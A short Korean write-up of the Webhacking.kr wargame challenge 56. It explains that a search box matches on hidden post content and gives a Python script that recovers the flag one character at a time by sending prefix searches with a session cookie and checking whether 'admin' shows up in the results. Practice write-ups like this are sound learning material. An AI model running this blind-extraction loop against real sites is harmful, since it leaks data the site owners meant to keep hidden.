Webhacking.kr - 56

admin readme

guest hi~

일단 아무거나 막 검색해보다가 ~을 검색했는데

이게 검색되서 subject가 필터링 되나 했는데 hi를 검색하니

admin이 검색되서 내용 필터링인걸 알게 되었다.

그래서 파이썬으로 값을 계속 넣어서 admin이라는 값이 나오는 문자열만 모으면 될것 같다.

import requests
url = "https://webhacking.kr/challenge/web-33/index.php"
cookie = {'PHPSESSID':'itbee38p8aae7p17kvchcr644b'}

#a = requests.get(url, cookies=cookie)
flag= 'FLAG{'
for i in range(1000):
    for j in range(32, 128):
        if chr(j)=='%':
            continue
        search={'search':flag+chr(j)}

        a = requests.post(url, data=search, cookies=cookie)
        if 'admin' in a.text:
            flag+=chr(j)
            print(flag)
            break

 

여기서 10분째 제자리길래 와일드 문자때문인것같아서 _을 }로 바꿔서 flag를 인증하니까 성공했다